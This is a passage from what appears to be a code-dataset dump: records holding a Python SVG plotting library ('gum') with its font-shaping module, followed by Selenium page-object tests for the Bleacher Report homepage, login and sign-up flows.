**attr)\n\nclass VStack(Container):\n def __init__(self, children, expand=True, aspect=None, **attr):\n n = len(children)\n children, heights = zip(*dedict(children, 1/n))\n aspects = [c.aspect for c in children]\n\n if expand:\n heights = [h/(a or 1) for h, a in zip(heights, aspects)]\n total = sum(heights)\n heights = [h/total for h in heights]\n\n cheights = cumsum(heights)\n children = [\n (c, (0, fh0, 1, fh1)) for c, fh0, fh1 in zip(children, cheights[:-1], cheights[1:])\n ]\n\n aspects0 = [h*a for h, a in zip(heights, aspects) if a is not None]\n aspect0 = max(aspects0) if len(aspects0) > 0 else None\n aspect = aspect0 if aspect is None else aspect\n\n super().__init__(children=children, aspect=aspect, **attr)\n\nclass HStack(Container):\n def __init__(self, children, expand=True, aspect=None, **attr):\n n = len(children)\n children, widths = zip(*dedict(children, 1/n))\n aspects = [c.aspect for c in children]\n\n if expand:\n widths = [w*(a or 1) for w, a in zip(widths, aspects)]\n total = sum(widths)\n widths = [w/total for w in widths]\n\n cwidths = cumsum(widths)\n children = [\n (c, (fw0, 0, fw1, 1)) for c, fw0, fw1 in zip(children, cwidths[:-1], cwidths[1:])\n ]\n\n aspects0 = [a/w for w, a in zip(widths, aspects) if a is not None]\n aspect0 = min(aspects0) if len(aspects0) > 0 else None\n aspect = aspect0 if aspect is None else aspect\n\n super().__init__(children=children, aspect=aspect, **attr)\n\n# TODO\nclass Grid:\n pass\n\n##\n## geometric\n##\n\nclass Ray(Element):\n def __init__(self, theta=-45, **attr):\n if theta == -90:\n theta = 90\n elif theta < -90 or theta > 90:\n theta = ((theta + 90) % 180) - 90\n direc0 = tan(theta*(pi/180))\n\n if theta == 90:\n direc = inf\n aspect = None\n elif theta == 0:\n direc = 0\n aspect = None\n else:\n direc = direc0\n aspect = 1/abs(direc0)\n\n attr1 = dict(stroke='black') | attr\n super().__init__(tag='line', aspect=aspect, unary=True, **attr1)\n self.direc = direc\n\n def props(self, ctx):\n x1, y1, x2, y2 = ctx.rect\n w, h = x2 - x1, y2 - y1\n if isinf(self.direc):\n x1 = x2 = x1 + 0.5*w\n elif self.direc == 0:\n y1 = y2 = y1 + 0.5*h\n elif self.direc > 0:\n y1, y2 = y2, y1\n base = dict(x1=x1, y1=y1, x2=x2, y2=y2)\n return base | self.attr\n\nclass VLine(Element):\n def __init__(self, pos=0.5, aspect=None, **attr):\n attr1 = dict(stroke='black') | attr\n super().__init__(tag='line', unary=True, aspect=aspect, **attr1)\n self.pos = pos\n\n def props(self, ctx):\n x1, y1, x2, y2 = ctx.rect\n w, h = x2 - x1, y2 - y1\n\n x1 = x2 = x1 + self.pos*w\n\n base = dict(x1=x1, y1=y1, x2=x2, y2=y2)\n return base | self.attr\n\nclass HLine(Element):\n def __init__(self, pos=0.5, aspect=None, **attr):\n attr1 = dict(stroke='black') | attr\n super().__init__(tag='line', unary=True, aspect=aspect, **attr1)\n self.pos = pos\n\n def props(self, ctx):\n x1, y1, x2, y2 = ctx.rect\n w, h = x2 - x1, y2 - y1\n\n y1 = y2 = y1 + self.pos*h\n\n base = dict(x1=x1, y1=y1, x2=x2, y2=y2)\n return base | self.attr\n\nclass Rect(Element):\n def __init__(self, **attr):\n attr1 = dict(fill='none', stroke='black') | attr\n super().__init__(tag='rect', unary=True, **attr1)\n\n def props(self, ctx):\n x1, y1, x2, y2 = ctx.rect\n w0, h0 = x2 - x1, y2 - y1\n\n x, y = x1, y1\n w, h = w0, h0\n\n base = dict(x=x, y=y, width=w, height=h)\n return base | self.attr\n\nclass Square(Rect):\n def __init__(self, **attr):\n super().__init__(aspect=1, **attr)\n\nclass Ellipse(Element):\n def __init__(self, **attr):\n attr1 = dict(fill='none', stroke='black') | attr\n super().__init__(tag='ellipse', unary=True, **attr1)\n\n def props(self, ctx):\n x1, y1, x2, y2 = ctx.rect\n w, h = x2 - x1, y2 - y1\n\n cx = x1 + 0.5*w\n cy = y1 + 0.5*h\n rx = 0.5*w\n ry = 0.5*h\n\n base = dict(cx=cx, cy=cy, rx=rx, ry=ry)\n return base | self.attr\n\nclass Circle(Ellipse):\n def __init__(self, **attr):\n super().__init__(aspect=1, **attr)\n\nclass Bullet(Circle):\n def __init__(self, **attr):\n attr1 = dict(fill='black') | attr\n super().__init__(**attr1)\n\n##\n## text\n##\n\ndef weight_map(x):\n if type(x) is str:\n if x == 'light':\n return 'Light', 200\n elif x == 'Bold':\n return 'Bold', 700\n else:\n return 'Regular', 400\n elif type(x) is int:\n if x <= 300:\n return 'Light', x\n elif x <= 550:\n return 'Regular', x\n else:\n return 'Bold', x\n else:\n return 'Regular', 400\n\nclass Text(Element):\n def __init__(\n self, text='', font_family=default_font_family,\n font_weight=default_font_weight, **attr\n ):\n str_weight, num_weight = weight_map(font_weight)\n\n self.text_width, self.text_height = get_text_size(\n text, font=font_family, weight=str_weight\n )\n self.text = text\n\n base_aspect = self.text_width/self.text_height\n super().__init__(\n tag='text', aspect=base_aspect, font_family=font_family,\n font_weight=num_weight, **attr\n )\n\n def props(self, ctx):\n x1, y1, x2, y2 = ctx.rect\n w, h = x2 - x1, y2 - y1\n\n fs = h/self.text_height\n\n base = dict(x=x1, y=y2, font_size=f'{fs}px', stroke='black')\n return base | self.attr\n\n def inner(self, ctx):\n return self.text\n\nclass Emoji(Element):\n def __init__(self, text='', font_family=default_emoji_font, **attr):\n self.text_width, self.text_height = get_text_size(text, font=font_family)\n self.text = text\n\n base_aspect = self.text_width/self.text_height\n super().__init__(tag='text', aspect=base_aspect, font_family=font_family, **attr)\n\n def props(self, ctx):\n x1, y1, x2, y2 = ctx.rect\n w, h = x2 - x1, y2 - y1\n fs = h/self.text_height\n\n # magic offsets\n x0, y0 = x1, y2 - 0.125*h\n fs0 = 1.25*fs\n\n base = dict(x=x0, y=y0, font_size=f'{fs0}px', stroke='black')\n return base | self.attr\n\n def inner(self, ctx):\n return self.text\n\nclass TextDebug(Container):\n def __init__(self, text='', font_family=default_font_family, **attr):\n label = Text(text=text, font_family=font_family, **attr)\n boxes = Rect(stroke='red')\n outer = Rect(stroke='blue', stroke_dasharray='5 5')\n\n # mimic regular Text\n self.text_width = label.text_width\n self.text_height = label.text_height\n\n # get full font shaping info\n cluster, shapes, deltas, offsets = get_text_shape(text, font=font_family)\n shapes = [(w, h) for w, h in shapes]\n deltas = [(w, -h) for w, h in deltas]\n\n # compute character boxes\n if len(deltas) == 0:\n crects = []\n else:\n tw, th = self.text_width, self.text_height\n cumdel = [(0, 0)] + [tuple(x) for x in np.cumsum(deltas[:-1], axis=0)]\n dshapes = [(dx, sy) for (dx, _), (_, sy) in zip(deltas, shapes)]\n rects = [(cx, cy, cx+dx, cy+dy) for (cx, cy), (dx, dy) in zip(cumdel, dshapes)]\n crects = [(x1/tw, 1-y2/th, x2/tw, 1-y1/th) for x1, y1, x2, y2 in rects]\n\n # render proportionally\n children = [label]\n children += [(boxes, tuple(frac)) for frac in crects]\n children += [outer]\n\n super().__init__(children=children, aspect=label.aspect, **attr)\n\nclass Node(Container):\n def __init__(self, text, padding=0.2, shape=Rect, debug=False, **attr):\n attr, text_args, shape_args = dispatch(attr, ['text', 'shape'])\n\n # generate core elements\n if type(text) is str:\n TextClass = TextDebug if debug else Text\n text = TextClass(text=text, **text_args)\n outer = shape(**shape_args)\n\n # auto-scale single number padding\n aspect0 = text.aspect\n if type(padding) is not tuple:\n padding = padding/aspect0, padding\n aspect1 = (aspect0+2*padding[0])/(1+2*padding[1])\n\n children = {\n text: pad_rect(padding),\n outer: None\n }\n\n super().__init__(children=children, aspect=aspect1, **attr)\n\n##\n## curves\n##\n\nclass Polygon(Element):\n def __init__(self, points, **attr):\n self.points = points\n super().__init__(tag='polygon', unary=True, **attr)\n\n def props(self, ctx):\n x1, y1, x2, y2 = ctx.rect\n w, h = x2 - x1, y2 - y1\n\n pc = [(x1 + fx*w, y1 + fy*h) for fx, fy in self.points]\n points = ' '.join([f'{x},{y}' for x, y in pc])\n\n base = dict(points=points, fill='none', stroke='black')\n return base | self.attr\n\nclass SymPath(Element):\n def __init__(self, fy=None, fx=None, xlim=None, ylim=None, tlim=None, N=100, **attr):\n super().__init__(tag='polyline', unary=True, **attr)\n\n if fx is not None and fy is not None:\n tvals = np.linspace(*tlim, N)\n if type(fx) is str:\n xvals = eval(fx, {'t': tvals})\n else:\n xvals = fx(tvals)\n if type(fy) is str:\n yvals = eval(fy, {'t': tvals})\n else:\n yvals = fy(tvals)\n xvals *= np.ones_like(tvals)\n yvals *= np.ones_like(tvals)\n elif fy is not None:\n xvals = np.linspace(*xlim, N)\n if type(fy) is str:\n yvals = eval(formula, {'x': xvals})\n else:\n yvals = fy(xvals)\n yvals *= np.ones_like(xvals)\n elif fx is not None:\n yvals = np.linspace(*ylim, N)\n if type(fx) is str:\n xvals = eval(formula, {'y': yvals})\n else:\n xvals = fx(yvals)\n xvals *= np.ones_like(yvals)\n else:\n raise Exception('Must specify either fx or fy')\n\n if xlim is None:\n self.xlim = np.min(xvals), np.max(xvals)\n else:\n self.xlim = xlim\n if ylim is None:\n self.ylim = np.min(yvals), np.max(yvals)\n else:\n self.ylim = ylim\n\n xmin, xmax = self.xlim\n ymin, ymax = self.ylim\n xrange = xmax - xmin\n yrange = ymax - ymin\n\n self.xnorm = (xvals-xmin)/xrange if xrange != 0 else 0.5*np.ones_like(xvals)\n self.ynorm = (ymax-yvals)/yrange if yrange != 0 else 0.5*np.ones_like(yvals)\n\n def props(self, ctx):\n x1, y1, x2, y2 = ctx.rect\n w, h = x2 - x1, y2 - y1\n\n xc = x1 + self.xnorm*w\n yc = y1 + self.ynorm*h\n points = ' '.join([f'{x},{y}' for x, y in zip(xc, yc)])\n\n base = dict(points=points, fill='none', stroke='black')\n return base | self.attr\n\n##\n## axes\n##\n\nclass HTick(Container):\n def __init__(self, text, thick=1, pad=0.5, text_scale=1, debug=False, **attr):\n attr, text_args = dispatch(attr, ['text'])\n\n if 'font_weight' not in text_args:\n text_args['font_weight'] = 'light'\n\n line = HLine(stroke_width=thick)\n\n if text is None or (type(text) is str and len(text) == 0):\n aspect = 1\n anchor = 0.5\n pad = 0\n children = [line]\n else:\n TextClass = TextDebug if debug else Text\n text = TextClass(text, **text_args) if type(text) is str else text\n tsize = text.aspect*text_scale\n\n width = tsize + pad + 1\n height = text_scale\n aspect = width/height\n anchor = 1 - 0.5/width\n\n children = {\n text: (0, 0, tsize/width, 1),\n line: ((tsize+pad)/width, 0, 1, 1)\n }\n\n super().__init__(children=children, aspect=aspect, **attr)\n self.anchor = anchor\n self.width = width\n self.height = height\n\nclass VTick(Container):\n def __init__(self, text, thick=1, pad=0.5, text_scale=1, debug=False, **attr):\n attr, text_args = dispatch(attr, ['text'])\n\n if 'font_weight' not in text_args:\n text_args['font_weight'] = 'light'\n\n line = VLine(stroke_width=thick)\n\n if text is None or (type(text) is str and len(text) == 0):\n aspect = 1\n anchor = 0.5\n pad = 0\n children = [line]\n else:\n TextClass = TextDebug if debug else Text\n text = TextClass(text, **text_args) if type(text) is str else text\n taspect = text.aspect*text_scale\n\n width = taspect\n height = 1 + pad + text_scale\n aspect = width/height\n anchor = 1 - 0.5/height\n\n children = {\n line: (0, 0, 1, 1/height),\n text: (0, (1+pad)/height, 1, 1)\n }\n\n super().__init__(children=children, aspect=aspect, **attr)\n self.anchor = anchor\n self.width = width\n self.height = height\n\nclass VScale(Container):\n def __init__(self, ticks, tick_size=default_tick_size, tick_args={}, **attr):\n if type(ticks) is dict:\n ticks = [(k, v) for k, v in ticks.items()]\n\n elems = [HTick(s, **tick_args) for _, s in ticks]\n locs = [x for x, _ in ticks]\n\n # aspect per tick and overall\n width0 = max([e.width for e in elems]) if len(elems) > 0 else 1\n aspect0 = max([e.aspect for e in elems]) if len(elems) > 0 else 1\n aspect = width0/(1/tick_size)\n\n # middle of the tick (fractional)\n anchor = (width0-0.5)/width0\n\n children = {\n e: (1-e.width/width0, 1-(x-tick_size/2), 1, 1-(x+tick_size/2))\n for e, x in zip(elems, locs)\n }\n\n super().__init__(children=children, aspect=aspect, **attr)\n self.anchor = anchor\n\nclass HScale(Container):\n def __init__(self, ticks, tick_size=default_tick_size, tick_args={}, **attr):\n if type(ticks) is dict:\n ticks = [(k, v) for k, v in ticks.items()]\n\n elems = [VTick(s, **tick_args) for _, s in ticks]\n locs = [x for x, _ in ticks]\n\n # aspect per tick and overall\n height0 = max([e.height for e in elems]) if len(elems) > 0 else 1\n aspect0 = max([e.aspect for e in elems]) if len(elems) > 0 else 1\n aspect = (1/tick_size)/height0\n\n # middle of the tick (fractional)\n anchor = 0.5/height0\n\n children = {\n e: (x-e.aspect/aspect/2, 1-e.height/height0, x+e.aspect/aspect/2, 1)\n for e, x in zip(elems, locs)\n }\n\n super().__init__(children=children, aspect=aspect, **attr)\n self.anchor = anchor\n\nclass VAxis(Container):\n def __init__(self, ticks, tick_size=default_tick_size, **attr):\n attr, tick_args = dispatch(attr, ['tick'])\n scale = VScale(ticks, tick_size=tick_size, tick_args=tick_args)\n line = VLine(scale.anchor)\n super().__init__(children=[scale, line], aspect=scale.aspect, **attr)\n self.anchor = scale.anchor\n\nclass HAxis(Container):\n def __init__(self, ticks, tick_size=default_tick_size, **attr):\n attr, tick_args = dispatch(attr, ['tick'])\n scale = HScale(ticks, tick_size=tick_size, tick_args=tick_args)\n line = HLine(scale.anchor)\n super().__init__(children=[scale, line], aspect=scale.aspect, **attr)\n self.anchor = scale.anchor\n\nclass Axes(Container):\n def __init__(self, xticks=[], yticks=[], aspect=None, **attr):\n attr, xaxis_args, yaxis_args = dispatch(attr, ['xaxis', 'yaxis'])\n\n # adjust tick_size for aspect\n if aspect is not None:\n xtick_size = xaxis_args.get('tick_size', default_tick_size)\n ytick_size = yaxis_args.get('tick_size', default_tick_size)\n xaxis_args['tick_size'] = xtick_size/sqrt(aspect)\n yaxis_args['tick_size'] = ytick_size*sqrt(aspect)\n\n if xticks is not None:\n xaxis = HAxis(xticks, **xaxis_args)\n fx = 1 - xaxis.anchor\n ax0 = xaxis.aspect\n else:\n xaxis = None\n fx = 1\n ax0 = 1\n\n if yticks is not None:\n yaxis = VAxis(yticks, **yaxis_args)\n fy = yaxis.anchor\n ay0 = yaxis.aspect\n else:\n yaxis = None\n fy = 1\n ay0 = 0\n\n # sans anchor aspects\n ax1 = ax0/fx\n ay1 = fy*ay0\n\n # square aspect?\n aspect0 = ax1*(1+ay1)/(1+ax1)\n aspect = aspect0 if aspect is None else aspect\n\n # constraints\n # 1: a0 = fy*wy + wx\n # 2: 1 = hy + fx*hx\n # 3: ax = wx/hx\n # 4: ay = wy/hy\n\n # get axes sizes\n hy = (ax1-aspect)/(ax1-ay1)\n wy = ay0*hy/aspect\n hx = (1-hy)/fx\n wx = ax0*hx/aspect\n\n # compute anchor point\n cx = fy*wy\n cy = 1 - fx*hx\n\n children = {}\n if xaxis is not None:\n children[xaxis] = (1-wx, 1-hx, 1, 1)\n if yaxis is not None:\n children[yaxis] = (0, 0, wy, hy)\n\n super().__init__(children=children, aspect=aspect, **attr)\n self.anchor = cx, cy\n\nclass Plot(Container):\n def __init__(self, lines, xlim=None, ylim=None, xticks=None, yticks=None, aspect=None, **attr):\n attr, xaxis_args, yaxis_args = dispatch(attr, ['xaxis', 'yaxis'])\n\n # allow singleton lines\n if type(lines) is not list:\n lines = [lines]\n\n # collect line ranges\n xmins, xmaxs = zip(*[c.xlim for c in lines])\n ymins, ymaxs = zip(*[c.ylim for c in lines])\n\n # determine coordinate limits\n if xlim is None:\n xmin, xmax = min(xmins), max(xmaxs)\n else:\n xmin, xmax = xlim\n if ylim is None:\n ymin, ymax = min(ymins), max(ymaxs)\n else:\n ymin, ymax = ylim\n\n # x/y coordinate functions\n xmap = lambda x: (x-xmin)/(xmax-xmin)\n ymap = lambda y: (y-ymin)/(ymax-ymin)\n\n # map lines into coordinates\n coords = [\n (xmap(x1), 1-ymap(y2), xmap(x2), 1-ymap(y1))\n for x1, x2, y1, y2 in zip(xmins, xmaxs, ymins, ymaxs)\n ]\n\n # construct/map ticks if needed\n if xticks is None or type(xticks) is int:\n xtick_num = xticks if xticks is not None else default_nticks\n xtick_vals = np.linspace(xmin, xmax, xtick_num)\n xticks = {xmap(x): str(f'{x:.2f}') for x in xtick_vals}\n else:\n if type(xticks) is list:\n xticks = {x: str(x) for x in xticks}\n xticks = {xmap(x): t for x, t in xticks.items()}\n if yticks is None or type(yticks) is int:\n ytick_num = yticks if yticks is not None else default_nticks\n ytick_vals = np.linspace(ymin, ymax, ytick_num)\n yticks = {ymap(y): str(f'{y:.2f}') for y in ytick_vals}\n else:\n if type(yticks) is list:\n yticks = {y: str(y) for y in yticks}\n yticks = {ymap(y): t for y, t in yticks.items()}\n\n # create axes\n axis_args = prefix(xaxis_args, 'xaxis') | prefix(yaxis_args, 'yaxis')\n axes = Axes(xticks=xticks, yticks=yticks, aspect=aspect, **axis_args)\n\n # map lines into plot area\n lbox = (axes.anchor[0], 0, 1, axes.anchor[1])\n children = {\n ln: map_coords(lbox, cr) for ln, cr in zip(lines, coords)\n }\n children[axes] = None\n\n super().__init__(children=children, aspect=axes.aspect, **attr)\n"
},
{
"alpha_fraction": 0.6738544702529907,
"alphanum_fraction": 0.6738544702529907,
"avg_line_length": 32.727272033691406,
"blob_id": "7c1cfe2ba029ea2e12b7a3b4b9ba4e66da05dc23",
"content_id": "65d49cca901a4b52eb220f023f6456e3625498c5",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 371,
"license_type": "permissive",
"max_line_length": 61,
"num_lines": 11,
"path": "/gum/__init__.py",
"repo_name": "iamlemec/gum",
"src_encoding": "UTF-8",
"text": "from .fonts import get_text_size, get_text_shape\n\nfrom .gum import (\n prefix, pos_rect, pad_rect,\n Element, Container, Spacer, SVG,\n Box, Frame, Point, Scatter, VStack, HStack, Grid,\n Ray, VLine, HLine, Rect, Square, Ellipse, Circle, Bullet,\n Polygon, SymPath,\n Text, Emoji, TextDebug, Node,\n HTick, VTick, VScale, HScale, VAxis, HAxis, Axes, Plot\n)\n"
},
{
"alpha_fraction": 0.6312413811683655,
"alphanum_fraction": 0.6367384195327759,
"avg_line_length": 26.287500381469727,
"blob_id": "8c46ea88d12ae5b7c05fed06a201a38e680f7525",
"content_id": "8ede6aebc1921be222932bf27c4bd929fd702586",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2183,
"license_type": "permissive",
"max_line_length": 83,
"num_lines": 80,
"path": "/gum/fonts.py",
"repo_name": "iamlemec/gum",
"src_encoding": "UTF-8",
"text": "##\n## font shaping interface\n##\n\nimport gi\ngi.require_version('HarfBuzz', '0.0')\nfrom gi.repository import HarfBuzz as hb\nfrom gi.repository import GLib\n\nimport os\nimport fontconfig as fc\n\ndef get_font_path(name=''):\n conf = fc.Config.get_current()\n pat = fc.Pattern.name_parse(name)\n conf.substitute(pat, fc.FC.MatchPattern)\n pat.default_substitute()\n font, stat = conf.font_match(pat)\n path, code = font.get(fc.PROP.FILE, 0)\n return path\n\ndef get_text_shape(text, font=None, weight=None, path=None, debug=False):\n if weight is not None:\n font = f'{font}:{weight}'\n if path is None:\n path = get_font_path(font)\n\n base, ext = os.path.splitext(path)\n ext = ext[1:]\n\n with open(path, 'rb') as fid:\n fontdata = fid.read()\n\n bdata = GLib.Bytes.new(fontdata)\n blob = hb.glib_blob_create(bdata)\n face = hb.face_create(blob, 0)\n\n font = hb.font_create(face)\n upem = hb.face_get_upem(face)\n hb.font_set_scale(font, upem, upem)\n # hb.font_set_ptem(font, font_size)\n\n if ext == 'woff':\n hb.ft_font_set_funcs(font)\n\n buf = hb.buffer_create()\n hb.buffer_add_utf8(buf, text.encode('utf-8'), 0, -1)\n\n hb.buffer_guess_segment_properties(buf)\n hb.shape(font, buf, [])\n infos = hb.buffer_get_glyph_infos(buf)\n positions = hb.buffer_get_glyph_positions(buf)\n extents = [hb.font_get_glyph_extents(font, i.codepoint) for i in infos]\n\n if debug:\n return font, infos, positions, extents\n\n norm = upem\n wh_extract = lambda ext: (ext.extents.width / norm, -ext.extents.height / norm)\n\n cluster = [(i.codepoint, i.cluster) for i in infos]\n shapes = [wh_extract(e) for e in extents]\n deltas = [(p.x_advance / norm, p.y_advance / norm) for p in positions]\n offsets = [(p.x_offset / norm, p.y_offset / norm) for p in positions]\n\n return cluster, shapes, deltas, offsets\n\ndef get_text_size(text, **kwargs):\n if len(text) == 0:\n return 0, 0\n\n cluster, shapes, deltas, offsets = get_text_shape(text, **kwargs)\n\n hshapes, vshapes = zip(*shapes)\n hdeltas, vdeltas = zip(*deltas)\n\n width = sum(hdeltas)\n height = max(vshapes)\n\n return width, height\n"
}
] | 4 |
weissbeckt/code_test
|
https://github.com/weissbeckt/code_test
|
e87a3720e1fa612bd52d09aa575496500c3abb59
|
fb52f268ba8ac6b39f8e4d25807fd22882f81ce8
|
dee65257bddb0ca10b0072f49e49276158e426a9
|
refs/heads/master
| 2020-06-12T02:29:11.952066 | 2019-06-27T22:09:54 | 2019-06-27T22:09:54 | 194,167,912 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.5841121673583984,
"alphanum_fraction": 0.6261682510375977,
"avg_line_length": 29.571428298950195,
"blob_id": "a53cde922be2b6b118ff64c56d2234448e714407",
"content_id": "c5e469f623e018c4692520dd5705c68af2ee4cdf",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 214,
"license_type": "no_license",
"max_line_length": 46,
"num_lines": 7,
"path": "/bleacher_report/bleacher_report_selenium_project/src/base.py",
"repo_name": "weissbeckt/code_test",
"src_encoding": "UTF-8",
"text": "class BasePage(object):\n\n def __init__(self, driver):\n self.driver = driver\n self.driver.implicitly_wait(20)\n self.driver.delete_all_cookies()\n self.driver.set_window_size(1280, 800)\n"
},
{
"alpha_fraction": 0.6761904954910278,
"alphanum_fraction": 0.6761904954910278,
"avg_line_length": 27.269229888916016,
"blob_id": "5ac307e75db2b1b85550389ad8eee6d73fcbb2bd",
"content_id": "a4c33503c4e5383f3b21b99db0f3bf1bd258451d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 735,
"license_type": "no_license",
"max_line_length": 90,
"num_lines": 26,
"path": "/bleacher_report/bleacher_report_selenium_project/src/home_page.spec.py",
"repo_name": "weissbeckt/code_test",
"src_encoding": "UTF-8",
"text": "import unittest\nfrom selenium import webdriver\nimport page\nimport os\ndir_path = os.path.dirname(os.path.realpath(__file__))\n\n\nclass HomePageSpec(unittest.TestCase):\n\n def setUp(self):\n self.driver = webdriver.Chrome(executable_path=dir_path + '/../chromedriver')\n self.driver.get(\"http://www.bleacherreport.com\")\n\n def testHomePageDisplays(self):\n\n # Just validate home page displays\n main_page = page.HomePage(self.driver)\n assert main_page.is_title_matches(), \"Bleacher Report title doesn't match.\"\n assert main_page.is_logo_displayed(), \"Bleacher Report logo button not displayed.\"\n\n def tearDown(self):\n self.driver.close()\n\n\nif __name__ == \"__main__\":\n unittest.main()\n"
},
{
"alpha_fraction": 0.6759762763977051,
"alphanum_fraction": 0.6769648790359497,
"avg_line_length": 32.99159622192383,
"blob_id": "ddf582be7c9fe0d5bfeda3a4be5993f19f959efc",
"content_id": "99f688a403664bf846c5bd8f71716f0d1e4c195b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4046,
"license_type": "no_license",
"max_line_length": 117,
"num_lines": 119,
"path": "/bleacher_report/bleacher_report_selenium_project/src/page.py",
"repo_name": "weissbeckt/code_test",
"src_encoding": "UTF-8",
"text": "from locators import HomePageLocators, LoginPageLocators, SignUpPageLocators\nfrom base import BasePage\nimport time\n\n\nclass HomePage(BasePage):\n\n def is_title_matches(self):\n return \"Bleacher Report\" in self.driver.title\n\n def is_logo_displayed(self):\n element = self.driver.find_element(*HomePageLocators.HOME_BUTTON)\n return element.is_displayed()\n\n def select_home_button(self):\n element = self.driver.find_element(*HomePageLocators.HOME_BUTTON)\n element.click()\n\n def select_login(self):\n element = self.driver.find_element(*HomePageLocators.LOGIN_BUTTON)\n element.click()\n\n def select_sign_up(self):\n element = self.driver.find_element(*HomePageLocators.SIGN_UP_BUTTON)\n element.click()\n\n\nclass LoginPage(BasePage):\n\n def is_login_method_page_displayed(self):\n element = self.driver.find_element(*LoginPageLocators.LOGIN_METHOD_PAGE)\n return element.is_displayed()\n\n def is_email_login_page_displayed(self):\n element = self.driver.find_element(*LoginPageLocators.EMAIL_LOGIN_PAGE)\n return element.is_displayed()\n\n def select_email_login(self):\n element = self.driver.find_element(*LoginPageLocators.EMAIL_SIGN_IN)\n element.click()\n\n def input_email(self, val):\n element = self.driver.find_element(*LoginPageLocators.EMAIL_INPUT)\n element.clear()\n element.send_keys(val)\n\n def input_password(self, val):\n element = self.driver.find_element(*LoginPageLocators.PASSWORD_INPUT)\n element.clear()\n element.send_keys(val)\n\n def sign_in(self):\n element = self.driver.find_element(*LoginPageLocators.SIGN_IN)\n element.click()\n\n def is_error_message_displayed(self):\n element = self.driver.find_element(*LoginPageLocators.ERROR_MESSAGE)\n return element.is_displayed()\n\n\nclass SignUp(BasePage):\n\n def is_sign_up_page_displayed(self):\n element = self.driver.find_element(*SignUpPageLocators.SIGN_UP_PAGE)\n return element.is_displayed()\n\n def is_username_sign_up_displayed(self):\n element = self.driver.find_element(*SignUpPageLocators.USERNAME_PAGE)\n return element.is_displayed()\n\n def is_name_page_displayed(self):\n element = self.driver.find_element(*SignUpPageLocators.NAMES_PAGE)\n return element.is_displayed()\n\n def is_email_sign_up_page_displayed(self):\n element = self.driver.find_element(*SignUpPageLocators.EMAIL_SIGN_UP_PAGE)\n return element.is_displayed()\n\n def select_email_sign_up(self):\n element = self.driver.find_element(*SignUpPageLocators.SIGN_UP_WITH_EMAIL)\n element.click()\n\n def input_first_name(self, val):\n element = self.driver.find_element(*SignUpPageLocators.FIRST_NAME)\n element.clear()\n element.send_keys(val)\n\n def input_last_name(self, val):\n element = self.driver.find_element(*SignUpPageLocators.LAST_NAME)\n element.clear()\n element.send_keys(val)\n\n def input_username(self, val):\n element = self.driver.find_element(*SignUpPageLocators.USERNAME_INPUT)\n element.clear()\n element.send_keys(val)\n\n def input_email(self, val):\n element = self.driver.find_element(*SignUpPageLocators.EMAIL_INPUT)\n element.clear()\n element.send_keys(val)\n\n def input_password(self, val):\n element = self.driver.find_element(*SignUpPageLocators.PASSWORD_INPUT)\n element.clear()\n element.send_keys(val)\n\n def select_continue(self):\n # Guess the button is still clickable when it is disabled so unfortunately just made a 2 second sleep for now\n # element = WebDriverWait(self.driver, 10).until(\n # EC.element_to_be_clickable((SignUpPageLocators.CONTINUE))\n # )\n time.sleep(2)\n element = self.driver.find_element(*SignUpPageLocators.CONTINUE)\n element.click()\n\n def back(self):\n element = self.driver.find_element(*SignUpPageLocators.BACK)\n element.click()\n\n"
},
{
"alpha_fraction": 0.6636415123939514,
"alphanum_fraction": 0.665343165397644,
"avg_line_length": 40,
"blob_id": "47141298606d673a403914044fa7a89860ded7d4",
"content_id": "06acf0a6c27a1bbc5271f6ae35fcbaf637501743",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1763,
"license_type": "no_license",
"max_line_length": 119,
"num_lines": 43,
"path": "/bleacher_report/bleacher_report_selenium_project/src/sign_up.spec.py",
"repo_name": "weissbeckt/code_test",
"src_encoding": "UTF-8",
"text": "import unittest\nfrom selenium import webdriver\nimport page\nimport os\ndir_path = os.path.dirname(os.path.realpath(__file__))\n\n\nclass LoginSpec(unittest.TestCase):\n\n def setUp(self):\n self.driver = webdriver.Chrome(executable_path=dir_path + '/../chromedriver')\n self.driver.get(\"http://www.bleacherreport.com/\")\n\n def testEmailSignUpFlow(self):\n first_name = \"first\"\n last_name = \"last\"\n dummy_user_name = \"b2lasdftds3lf3\"\n main_page = page.HomePage(self.driver)\n\n # Select sign up (Not actually creating a user in prod for you guys testing back and home buttons here as well)\n main_page.select_sign_up()\n sign_up_page = page.SignUp(self.driver)\n assert sign_up_page.is_sign_up_page_displayed(), \"Sign Up page did not display.\"\n sign_up_page.select_email_sign_up()\n assert sign_up_page.is_name_page_displayed(), \"Name input page did not display.\"\n sign_up_page.input_first_name(first_name)\n sign_up_page.input_last_name(last_name)\n sign_up_page.select_continue()\n assert sign_up_page.is_username_sign_up_displayed(), \"Username input page did not display.\"\n sign_up_page.input_username(dummy_user_name)\n sign_up_page.select_continue()\n assert sign_up_page.is_email_sign_up_page_displayed(), \"Email input page for sign up did not display.\"\n sign_up_page.back()\n assert sign_up_page.is_username_sign_up_displayed(), \"Username input page did not display after going back.\"\n main_page.select_home_button()\n assert main_page.is_logo_displayed(), \"User not navigated home after selecting home button.\"\n\n def tearDown(self):\n self.driver.close()\n\n\nif __name__ == \"__main__\":\n unittest.main()\n"
},
{
"alpha_fraction": 0.49550706148147583,
"alphanum_fraction": 0.5096276998519897,
"avg_line_length": 24.129032135009766,
"blob_id": "5217f0a7d416b65df8e86aa483381aa00a748f65",
"content_id": "a408714d7db0d4daa212bda3f96d092b0f4b0f1f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 779,
"license_type": "no_license",
"max_line_length": 105,
"num_lines": 31,
"path": "/bleacher_report/bleacher_report_tests/guess.py",
"repo_name": "weissbeckt/code_test",
"src_encoding": "UTF-8",
